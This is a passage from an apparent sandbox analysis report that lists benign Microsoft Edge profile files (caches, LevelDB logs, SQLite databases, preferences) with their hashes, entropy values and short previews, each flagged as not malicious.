Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.629307656487099E-4
Encrypted:	false
SSDEEP:	3:LsFl0lH:LsFK
MD5:	F29F71CF11DFC7A8A77B6D115347087A
SHA1:	5BFF7956D368FF2A51C61F4C1F0D34775D64E081
SHA-256:	A31CA6858842E0C7D7E84A3C1566611E4865FDAA27CA13615A30DDB4E4B7E0AB
SHA-512:	A98D0DE0E1CEF9D00C373E55A01DA1DB5C0353AEC503014004101B7DCFBC3A32460EE3D9B1B34AAEA7008A3E43CE7D21D4FF06CE9B0DBBE65D46B685B6790D7B
Malicious:	false
Preview:	........................................=.s.u./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	393
Entropy (8bit):	5.210297906933626
Encrypted:	false
SSDEEP:	6:H+pLT+B1CN23oH+TcwtzjqEKj3K/2jM8B2KLlV+pLTQFYDpM+q2PCN23oH+Tcwtc:EGJYebvqBvFL84upM+v1YebvqBQFUv
MD5:	D266EFFAA1077FCFF17222ED79A61FF3
SHA1:	C983C526FA52BA6AD35EFF34CE702F2394A3EF28
SHA-256:	5EDD82C62A6EE446D34E4DD6C6F380DB9C800A9B86CAACBBB0794EE00618D013
SHA-512:	009E310AD41DCF033894E69993F876B1739A0EB5090CE4F02FBED21CB22A3758B347F1254F116BA30669E1F3657371B1DC15FD6FEF4CA74F39122EB4419FC416
Malicious:	false
Preview:	2024/11/01-15:58:13.670 1dfc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb since it was missing..2024/11/01-15:58:13.735 1dfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.5559092700436605
Encrypted:	false
SSDEEP:	48:TfIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:DIEumQv8m1ccnvS6
MD5:	9E6F2C8B7E0D238554688F45D7AB4C09
SHA1:	4FF260CB36625DCD08F7D9CF670C6FA62C749614
SHA-256:	2DD20F8D185663C951186F4A49ACDB759E0BA2BABC4BF3E18A1E3BF2C003E826
SHA-512:	FDEC30B53625897B705D716E2C982735BD1EECDE8AE72E212DE103E2CEF1D5007DE3F3C1819474B40FE67E7498F89540980773E25110CBC497B0496903EDFF3B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2095
Entropy (8bit):	6.248459225024703
Encrypted:	false
SSDEEP:	48:ika17NpmKOTWzdTYRV+ETlht4l9EpmPL1lyTJpliBpmPL1lZ0TJ3:ika15pROTWzqRAqlP4lepwxlIpl6pwxw
MD5:	BD170F7CB00634B14099E1691CDCFE71
SHA1:	30FE4D1CC17E296899A2A7A643F6E4DCF01F7653
SHA-256:	C59E6C79E74A55D2C043C2B9AE507A71CE93B22459B57D60926BE93FBD155112
SHA-512:	B48303AE76F4DA53E9176CE120F689DFC4BA71474833E70F2BF853FEAD7812B1C16A5CBEB7E01595D1766E20DCDE92488E2BCF5686294008F8C7F5EA0C28BA5A
Malicious:	false
Preview:	...n'................_mts_schema_descriptor.....F..................F.................3k.)................device_info-GlobalMetadata@.........J..\|..... ..oQxBx3XB+LeESt8u9/Z/2A==2.000340011677ED77.'device_info-md-oQxBx3XB+LeESt8u9/Z/2A==]..O9Y4QRTO52yAtnmJvgDmbxgG0y4=.. .(.0..........8...../@...../J.Fo0ZVE38AhfYdxChT37PSoU+O9U=R..'device_info-dt-oQxBx3XB+LeESt8u9/Z/2A==....oQxBx3XB+LeESt8u9/Z/2A==..To Be Filled By O.E.M..."QChrome WIN 93.0.961.52 (55ddfa3ef850523eea11b31f81b5facebd8934c3) channel(stable).93.0.961.52:$d14a0d0c-703a-47a1-a1a4-158e21707eb4@...../J...Z.To Be Filled By O.E.M.b.To Be Filled By O.E.M.h..r..........93.0.961.52$nd i................device_info-GlobalMetadata@.........J..\|..... ..oQxBx3XB+LeESt8u9/Z/2A==2.000340011677ED77.b.Z................'device_info-md-oQxBx3XB+LeESt8u9/Z/2A==}..O9Y4QRTO52yAtnmJvgDmbxgG0y4=.$4825df59-2fc2-4a0b-a2d5-569bbcb87906.. .(.0...../8...../@...../J.Fo0ZVE38AhfYdxChT37PSoU+O9U=..device_info-GlobalMetadata@.........J..\|..... ..oQxBx3X

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.231077954469733
Encrypted:	false
SSDEEP:	6:H+pL3E9+q2PCN23oH+TcwtpIFUt8Y+pL9MJZmw+Y+pLXON9VkwOCN23oH+TcwtaQ:ETi+v1YebmFUt8zhe/+za3V5eYebaUJ
MD5:	2D60D6698B0FBAAE1B991C6D4A98A965
SHA1:	EAE0872E59AC4768DED67962A3E0E8D051BC50F3
SHA-256:	3FF4B793FF68D788DA085FAB90C5D98146D6D0E987F6E91CAE3E264CA494B9A9
SHA-512:	1F3AA3F6FE53835331DDEB6DE581E47F79E3760D5B4C4BC8ACCB2B0D6E97D45D50AC8158EFA6EFBAB69B0B74F21C67AFEA0755649E322C67E9A593E06BB27825
Malicious:	false
Preview:	2024/11/01-15:58:13.163 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/01-15:58:13.217 1ebc Recovering log #3.2024/11/01-15:58:13.233 1ebc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.231077954469733
Encrypted:	false
SSDEEP:	6:H+pL3E9+q2PCN23oH+TcwtpIFUt8Y+pL9MJZmw+Y+pLXON9VkwOCN23oH+TcwtaQ:ETi+v1YebmFUt8zhe/+za3V5eYebaUJ
MD5:	2D60D6698B0FBAAE1B991C6D4A98A965
SHA1:	EAE0872E59AC4768DED67962A3E0E8D051BC50F3
SHA-256:	3FF4B793FF68D788DA085FAB90C5D98146D6D0E987F6E91CAE3E264CA494B9A9
SHA-512:	1F3AA3F6FE53835331DDEB6DE581E47F79E3760D5B4C4BC8ACCB2B0D6E97D45D50AC8158EFA6EFBAB69B0B74F21C67AFEA0755649E322C67E9A593E06BB27825
Malicious:	false
Preview:	2024/11/01-15:58:13.163 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/01-15:58:13.217 1ebc Recovering log #3.2024/11/01-15:58:13.233 1ebc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 8, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1270069299941012
Encrypted:	false
SSDEEP:	192:sV+4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWUsVusE6:sV+4n/9p/39J6hwNKRmqu+3VusE
MD5:	A0809345D97723CD4173E27957D88904
SHA1:	0F591E66F05A0422B8FC81A5B0AB6099A6C9A226
SHA-256:	3CA1D9E735A21DF7A4C6CC6272F5754B1EBD6DC79AC4E3E61E3562B4E71FE36E
SHA-512:	7BA1223D04BBA47F0D579FD47654773EAEF2A41BC53BC0323F84095F19CE04A0084AB58F999B6A3ED61F33A87B2142E07AF0493F14EAA307985EC2BA44997617
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b7b5f9b1-4078-4426-9c02-c74486407b90.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	MS Windows icon resource - 8 icons, 16x16, 32 bits/pixel, 20x20, 32 bits/pixel
Category:	dropped
Size (bytes):	71757
Entropy (8bit):	6.771708343960135
Encrypted:	false
SSDEEP:	1536:vAlMWz7vLDtDSVlXXwpFlorgLUxF+D4n6owPFCawP/:vvuWAUxFaoGw/
MD5:	E5E3377341056643B0494B6842C0B544
SHA1:	D53FD8E256EC9D5CEF8EF5387872E544A2DF9108
SHA-256:	E23040951E464B53B84B11C3466BBD4707A009018819F9AD2A79D1B0B309BC25
SHA-512:	83F09E48D009A5CF83FA9AA8F28187F7F4202C84E2D0D6E5806C468F4A24B2478B73077381D2A21C89AA64884DF3C56E8DC94EB4AD2D6A8085AC2FEB1E26C2EF
Malicious:	false
Preview:	............ .h............. ............... ......... .... .........((.... .h....%..00.... ..%..>@..@@.... .(B...e........ .?p......(....... ..... ..........................................w...x...y...v...j...c...\...N...........................w.<.w...y...x...]...P...M...N...N...N...M...H.<.............w.<.w...y...{...]...P...O...Q...R...P...O...N...K...H.<.........w...y...{...p...P...P...Q...S...Q...P..N...N..K...K.......w...y...{...\|...i...Q...P...S...R.......................I.W.....y...{...}.......c...Q...Q...U.W......3<..6.i.?.V.D.L.L.@.Q<.....{...}..........n...P...S............3.7...;.f.B.P.P.D.U.8.[W.}................P...P.s..........3...7...<.g.H.c.O.R.Y.?.].................u...J...........6..8...?...E.o.O.U.W.L._..............................$...7...@...J.o.O.b.].L.f..+..............................0...;...J...S.h.].X.e.../..0.................!.........2...<...G...P.i.g.Y.m.......1..2..0...0.......+......*...1...8...C...M.~.^.m.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Rv:1qIFJ
MD5:	6752A1D65B201C13B62EA44016EB221F
SHA1:	58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
SHA-256:	0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
SHA-512:	9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
Malicious:	false
Preview:	MANIFEST-000004.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Rv:1qIFJ
MD5:	6752A1D65B201C13B62EA44016EB221F
SHA1:	58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
SHA-256:	0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
SHA-512:	9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
Malicious:	false
Preview:	MANIFEST-000004.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	136
Entropy (8bit):	4.464534619049736
Encrypted:	false
SSDEEP:	3:tRrVUpKQxMFmWZmwv2YVUpKQSr82O7V87YVUpKQSr82O7WGv:H+pLKFZZmw+Y+pLSrU7VeY+pLSrU7tv
MD5:	D0B27A08B52FAF6118ECCD88040582F6
SHA1:	EAD064534C53CCE262D8651354B1CB8A82F5B911
SHA-256:	D5284AEA47BE3972F6486D6EB3A0C8E3BE505B346F25571F9A73E92DEC055195
SHA-512:	D2D7257E06506DF7EBEC2C73A51B8F4627DC65AB4AF9D7EB843CCF783F4BF2E3D4601A3A571BAC94010603FC92C88FDCAAC9F8871A3AECD0FB41E9824879F3B8
Malicious:	false
Preview:	2024/11/01-15:58:15.992 388 Recovering log #3.2024/11/01-15:58:16.011 388 Delete type=0 #3.2024/11/01-15:58:16.011 388 Delete type=3 #2.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	136
Entropy (8bit):	4.464534619049736
Encrypted:	false
SSDEEP:	3:tRrVUpKQxMFmWZmwv2YVUpKQSr82O7V87YVUpKQSr82O7WGv:H+pLKFZZmw+Y+pLSrU7VeY+pLSrU7tv
MD5:	D0B27A08B52FAF6118ECCD88040582F6
SHA1:	EAD064534C53CCE262D8651354B1CB8A82F5B911
SHA-256:	D5284AEA47BE3972F6486D6EB3A0C8E3BE505B346F25571F9A73E92DEC055195
SHA-512:	D2D7257E06506DF7EBEC2C73A51B8F4627DC65AB4AF9D7EB843CCF783F4BF2E3D4601A3A571BAC94010603FC92C88FDCAAC9F8871A3AECD0FB41E9824879F3B8
Malicious:	false
Preview:	2024/11/01-15:58:15.992 388 Recovering log #3.2024/11/01-15:58:16.011 388 Delete type=0 #3.2024/11/01-15:58:16.011 388 Delete type=3 #2.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	50
Entropy (8bit):	5.028758439731456
Encrypted:	false
SSDEEP:	3:Ukk/vxQRDKIVmt+8jzn:oO7t8n
MD5:	031D6D1E28FE41A9BDCBD8A21DA92DF1
SHA1:	38CEE81CB035A60A23D6E045E5D72116F2A58683
SHA-256:	B51BC53F3C43A5B800A723623C4E56A836367D6E2787C57D71184DF5D24151DA
SHA-512:	E994CD3A8EE3E3CF6304C33DF5B7D6CC8207E0C08D568925AFA9D46D42F6F1A5BDD7261F0FD1FCDF4DF1A173EF4E159EE1DE8125E54EFEE488A1220CE85AF904
Malicious:	false
Preview:	V........leveldb.BytewiseComparator...#...........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.340905649345012
Encrypted:	false
SSDEEP:	12:TLiqiUnGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiZNiD+lZk/Fj+6UwccNp15fBG
MD5:	B11E5455DBFF7FCC2B02933DB574441D
SHA1:	3EE66D609B4260B5A65524E2E2B6AF5E88B07EEF
SHA-256:	083E9F0A764A91F7E1DE106C893A78BF46321585E0682C54C4B690433FF87903
SHA-512:	9ABC60253E12F631EF11C70CFD4D8C2FAEFE17853AB83AAA43ED90484B76BCE016F3E51D7EB602239C97F87987F08B433F10836168C06CA195F54A8BE8319BF0
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ea34f6a9-46e6-41bf-8242-194cef0498fb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	7894
Entropy (8bit):	4.958638830750649
Encrypted:	false
SSDEEP:	192:s7ITNk9jPcAWMdkW7vouYI3+YJuRhqyrnh/I:s7ITNk9jPcAWMdnboVIS0aI
MD5:	156EBADB469ACBA0BB001426DA827FB7
SHA1:	5DC1E80010FE7593A4568970DC8E47FDA40E3C65
SHA-256:	E1352919EFCC666630A2ECACF7F078527EDB7E68A6DD190E11FE6C6D998824F8
SHA-512:	6E2B2D4CA3262FC0E2F974B4AC63455B17CD1E6EDAA425CE6A084B9DDF80DCFF19A8B55554AD5ADDC07EF7E0F9BCA6B572FA762BE013AD9D6C688A1CC6293E7E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_info":[],"account_tracker_service_last_update":"13374964693575399","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles":{"browser_name":6,"is_AutoFillFormData_imported":true,"is_Cookies_imported":true,"is_Extensions_imported":true,"is_Favorite_imported":true,"is_History_imported":true,"is_Payments_imported":true,"is_SavedPasswords_imported":true,"is_Settings_imported":true,"source_path":"C:\\Users\\user\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default"}},"imported_default_search_engine":"https://www.bing.com/search?q={searchTerms}&FORM={referrer:source}"},"autocomplete":{"retention_policy_last_version":94},"autofill":{"orphan_rows_removed":true},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_norm

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.6325854204969715
Encrypted:	false
SSDEEP:	48:hDennnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnE/yjyjyjyjyjy9:eduwgz/1Z
MD5:	3188FFBF9AAF46FA042A3883FC946BC1
SHA1:	F20A379C182BD95608AAD9B70EFE4CA9956BBF37
SHA-256:	E0E14F9513D693F613976F6378EC9915648C51BF5F763D20955D1C9EC61B9979
SHA-512:	EC8BA536160B169BD51084E9F6BBDD0530ECEEA2AD12BC08C7C87E1BFF0A8A3777E817D8CFC63A19C790FC2DABCF73E2EC393D581AEA68ED68D2422D89F56EA6
Malicious:	false
Preview:	..-........................[..I.(...V..Y....\..-........................[..I.(...V..Y....\........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	2706872
Entropy (8bit):	4.154040173853787
Encrypted:	false
SSDEEP:	12288:CUoVcSbpgk2XHZ0ZsQPY5u17Ytr/p3lCherPZINa+vwLR/t4R2elVI2M4:k
MD5:	CCFB1AA4CC08829F3F088B5A00BBCF70
SHA1:	C23DB366E9DEB2EF0E7E3B41C6C807620541447F
SHA-256:	25BF1DB790B59227C31E9CE65F7B24920D9B6FFF2C36AB616C37D67A6217EC8E
SHA-512:	A3F1AA7DC9E87B48CBD3959584FAF575D2909D376A5F47EAA51B46908CAB0D8F1DCB1BF9F821D6718AA73FBD0634459B2D50A1C44862C47C6F59D50C4757CC95
Malicious:	false
Preview:	7....-...........(...V.c.+.6.-.........(...V...d.wL............c....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	5.191544479427758
Encrypted:	false
SSDEEP:	3:VVXntjQPEnjQHpbtG6lhs6l1KRa5WPtKOCG+UI5WPtKOCuZ6D+MZ4NyN1FMZ4N1E:/XntM+4btGaT4K7t4KC3NSF3N1E
MD5:	71F1BC48C18BA246F08654C8C6DDBFD7
SHA1:	F475CE0A9E948A421132491010376D590B9B784C
SHA-256:	F62E68AC1B6C405346F2652BBD24DB86F9236302CB79D852621B8A370B02C777
SHA-512:	60FE2F7C263361CF7DF96B1BB9268E8D9142DA0EA497767718F51641727A1835483AA7B1B8CD0F4757668BF98B68A11489B6A735E98D4F7DDB70677013236DAD
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1.....................4_IPH_LiveCaption...IPH_LiveCaption......4_IPH_PasswordsAccountStorage!..IPH_PasswordsAccountStorage......4_IPH_ProfileSwitch...IPH_ProfileSwitch....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.210286946453763
Encrypted:	false
SSDEEP:	6:H+pLJ3+q2PCN23oH+TcwtfrK+IFUt8Y+pLJXZmw+Y+pLc3VkwOCN23oH+TcwtfrF:EQv1Yeb23FUt8zx/+z05eYeb3J
MD5:	6DFB0B4C9A9C201664F40996D32EFD57
SHA1:	0F1AD59CE772BF1B98AABBA65A48E041971AC714
SHA-256:	98187419E1638A9EAF442B35E4F553C3BAD14D526D8C9020C5E1ADA6E87F9798
SHA-512:	A4A243A501365B05D337483C8B48BF4C8D71BFCABB4BE75B62FF8F4D3774271676015D703CF8B0E5BDDE2118854C8DB3F18A7838D029D4DBDA9A6344F0AFE6D1
Malicious:	false
Preview:	2024/11/01-15:58:13.588 858 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/01-15:58:13.588 858 Recovering log #3.2024/11/01-15:58:13.589 858 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.210286946453763
Encrypted:	false
